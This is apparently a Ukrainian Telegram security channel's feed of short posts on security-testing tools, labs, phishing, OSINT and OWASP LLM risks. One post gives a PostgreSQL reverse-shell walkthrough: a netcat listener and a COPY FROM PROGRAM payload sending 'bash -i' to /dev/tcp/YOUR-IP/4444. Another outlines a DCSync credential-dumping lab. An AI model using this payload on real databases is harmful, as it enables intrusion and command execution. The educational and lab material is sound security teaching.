🇺🇦 Security QA
5.69K subscribers
264 photos
68 videos
117 files
856 links
Книги по тестуванню, інструменти по хакінгу, відео з конференцій.

Блог https://svyat.tech

Написати мені @SvyatLogin
Download Telegram
Цікавий ресурс аналізу безпеки вашого JWT. Можна не лише розпарсити як то у jwt.io але і зразу проаналізувати.
Звісно, що даний ресурс не всі методи перевірки покриває, але в частині використанням алгоритмів і деяких інших притаманних JWT особливостей місця підсвічує.
https://jwtlens.netlify.app/
6👍4
Якщо ви працюєте з PostgreSQL, можете спробувати себе частково в ролі Red Team.
Для цього вам потрібен користувач із правами pg_execute_server_program.
І так, підключаємось до бази:
psql -h hostname/ip -p 6543 -U username -d database 

Перевірямо наявність у поточного користувача потрібних прав або наявність таких користувачів у базі:
SELECT rolname
FROM pg_roles
WHERE pg_has_role(rolname, 'pg_execute_server_program', 'member');

або
SELECT has_role(current_user, 'pg_execute_server_program', 'member');

Якщо ваш користувач присутній у списку - можна переходити до наступного етапу.
Піднімаємо listener (слухача) на хості, що знаходиться в тій самій мережі, що і база даних, або на іншому, якщо дозволяє мережеве оточення:
nc -lvnp 4444

Далі запускаємо команду у PostgreSQL:
COPY poc_output FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/YOUR-IP/4444 0>&1"';

Якщо налаштування прав користувачів у PostgreSQL не обмежують використання COPY FROM PROGRAM або загалом права занадто широкі - ви отримаєте reverse shell від імені того користувача, під яким працює служба PostgreSQL.
8🤯6
Найпоширеніші техніки фішингу
Фішинг у рамках red teaming передбачає імітацію реалістичних атак, які використовують людські вразливості для несанкціонованого доступу до систем або конфіденційної інформації. Ці методи можуть включати цілеспрямований фішинг (spear-phishing), коли надсилаються електронні листи конкретним особам з метою змусити їх натиснути на шкідливі посилання або розкрити облікові дані, або “whaling” — фішинг, спрямований на високопоставлених осіб, як-от керівників. Атакувальники також можуть використовувати голосовий фішинг (vishing) або фішинг через SMS (smishing), щоб виманити в жертв інформацію. Учасники red team створюють переконливі сценарії, щоб перевірити здатність організації виявляти та реагувати на ці техніки соціальної інженерії.

https://svyat.tech/top-phishing-techniques
👍82
У Паші вже 29 відосів про тестування безпеки в веб застосунках, там можете знайти багато цікавих порад як шукати різноманітні вразливості.

https://www.youtube.com/watch?v=xwnMANGzQNc&list=PLxYN9UPEuN1Hx7wEUlmw7o9ej7BQwmnUw
👍29🔥178
1754594131714.pdf
14.1 MB
Які новинки в CHATGPT вийшли вчора
🔥4
А в що ви вдягнені нижче пояса на зустрічах онлайн або ж не вдянені ?
🤣372
Headerpwn

Фазер для аналізу реакції серверів на різні заголовки HTTP.

Цей інструмент зроблений для пошуку аномалій та аналізу того, як сервери реагують на різні HTTP-заголовки.

Він може надати цінну інформацію про потенційні ризики безпеки та неправильну конфігурацію.

Може інтегруватись з Burp Suite для єдиного інтерфейсу в проведені пентесту.

Запуск командою
headerpwn -url https://example.com -headers my_headers.txt

https://github.com/devanshbatham/headerpwn
👍20
Так як курсу не буде, бо група не зібралась, то закидую хоча б літературу OWASP Top 10 for LLM Applications, тут зібрані всі критичні точки які ви маєте переглянути в запроваджені безпечного використання LLM.

https://owasp.org/www-project-top-10-for-large-language-model-applications/assets/PDF/OWASP-Top-10-for-LLMs-v2025.pdf
48👍6🤣4🤔1
Всілякі лабораторії хмарних серверів від iknowjason, 2025

Безкоштовні навчальні лабораторії з хмарної безпеки. Включає CTF, самостійні семінари, керовані лабораторії з вразливостей та дослідницькі лабораторії.

Доречі, мало б бути також на нашому курсі(

Що там є:
📌 AWS;
📌 Azure;
📌 GCP;
📌 Kubernetes;
📌 Контейнер;
📌 Terraform;
📌 Дослідницькі лабораторії;
📌 CI/CD.

https://github.com/4ndersonLin/awesome-cloud-security
15👍3
Безкоштовний курс по AI - https://academy.tcm-sec.com/p/ai-100-fundamentals
Сама платформа націлена на курси по безпеці, але цей може бути цікавим усім, хто використовує LLM.
🔥26
Media is too big
VIEW IN TELEGRAM
Коли у мене запитують на роботі, які в мене задачі на тиждень)))
🤣17👍2
Image Whisperer

Новий ШІ-інструмент, який не просто дивиться на ваші медіафайли, а буквально «читає їх думки». Підтягує гугл-фактчек, веб-пошук, реверсивні пошуковики, метадані й навіть має свій вбудований «детектор брехні» для картинок (вгадав 8 із 10 зображень — і це без кави). А ще він настільки уважний, що відразу покаже, де були «підмальовані зуби», «підкручені очі» або «притюнінговане авто». Ну, знаєте, класичний набір.

Локацію зйомки теж визначає, причому йому вистачить навіть скромних деталей: панельна стеля, самотня лампочка без абажура чи форма батареї. У підсумку він може не тільки знайти правильний регіон, а й натякнути, в якій країні ви так майстерно робили селфі.

Плюс, Image Whisperer аналізує окремі об’єкти: ви показуєте — він розповідає. І робить це без фантастичних вигадок, лише по суті (якщо фото не зроблене на «калькулятор», звісно).

https://imagewhisperer.org/
👍122🤯2🔥1
Ну що всі вже зробили предзамовлення?))
🤣48
Хочете зробити вигляд бурної діяльності у вас на компі перед шефом?

Є рішення - Онлайн-симулятор хакера

Почніть друкувати випадковий текст, щоб імітувати зламування комп'ютерної системи

https://pranx.com/hacker/
🤣34🔥41
Credential Dumping_DCSync Attack_2025.pdf
2.4 MB
Злив облікових даних: DCSync-атака

Атака DCSync для зливу облікових даних в Active Directory — це спеціалізована техніка, яку використовують зловмисники для витягування облікових даних із контролера домену (DC), імітуючи поведінку самого контролера домену.

🛠 Налаштування лабораторного середовища для симуляції атаки
📚 Розуміння протоколу DRS і механіки атаки
🔍 Чому такі некоректні конфігурації трапляються в реальному житті
💣 Використання помилкової конфігурації для атаки
🗺 Відображення атаки на MITRE ATT&CK
👁 Виявлення атаки
🛡 Стратегії пом’якшення (мітігації)

👁 Налаштування лабораторії
Вимоги:
• Віртуалізоване середовище (наприклад, VMware, VirtualBox або Hyper-V).
• Windows Server, налаштований як контролер домену.
• Клієнтська машина Windows.
• Інструменти: Impacket, Mimikatz, Netexec і Metasploit.
🔥111👍1
Захоплення акаунту через OAuth вразливості. Burp Suite. LabPortswigger лабораторна 34.

Всім привіт! Продовжуємо відео про кібербезпеку. У цьому відео ми продовжуємо практикуватись з OAuth.

https://www.youtube.com/watch?v=3PtR2AmgWpo&feature=youtu.be
22🔥3👍2
🔐 Awesome Open Source

Категорія Security — це велике зібрання відкритих проектів, інструментів та бібліотек, пов’язаних із безпекою в ІТ. 

Що можна знайти там?
- Класифікація за тематичними напрямками (наприклад: authentication, cryptography, vulnerability scanning, penetration testing, encryption, secure by default тощо) 
- Посилання на різні open-source рішення: фреймворки, утиліти, бібліотеки й інструменти, які допомагають в питаннях безпеки

Чому це корисно?
- Для розробників — можливість швидко знайти готові та перевірені рішення з безпеки
- Для команд DevSecOps й спеціалістів з інформаційної безпеки — як довідник ідей для інструментів, які можна інтегрувати
- Для навчання — хороша база для дослідження різноманітних напрямків у сфері security

https://awesomeopensource.com/categories/security
🔥17
🕵️‍♂️ OpenCTI платформа кіберрозвідки з відкритим кодом

Це потужний інструмент для збору, аналізу та візуалізації даних про кіберзагрози.
Він допомагає організаціям будувати єдину базу знань про загрози, відстежувати взаємозв’язки між атакуючими групами, техніками MITRE ATT&CK, індикаторами компрометації (IoC) та інцидентами.

Що вміє:
•Інтеграції з десятками джерел (MISP, VirusTotal, CrowdStrike, AlienVault, тощо)
•Графічні зв’язки між об’єктами розвідки
•Підтримка стандартів STIX 2.1 та TAXII
•Автоматизація обміну розвідувальною інформацією
•Ролі, API та масштабування для великих команд

Використовується аналітиками SOC, CERT, DFIR та threat intelligence-командами по всьому світу.

https://github.com/OpenCTI-Platform/opencti
🔥63
Media is too big
VIEW IN TELEGRAM
А що ви робите коли закінчились безкоштовні запити в ChatGPT?
🤣391🔥1🤯1
OSINT Handbook

Це систематизований індекс з понад 5 000 посилань у 34 категоріях, присвячених інструментам і ресурсам відкритої розвідки. 

Це — не просто перелік, а корисний навігатор для тих, хто працює з відкритими джерелами даних, аналітикою, розслідуваннями та інформаційною безпекою.

🚀 Що можна знайти всередині?
• Каталог інструментів пошуку (соціальні мережі, архіви, мета-пошук тощо)
• Ресурси для перевірки зображень, геолокації, метаданих
• Інструменти для аналітики соціальних мереж
• Рекомендації з етики та безпеки при використанні OSINT
• Посилання, які допоможуть доповнити власну “технічну карту” інструментів

https://www.osinthandbook.com/
8👍3🔥1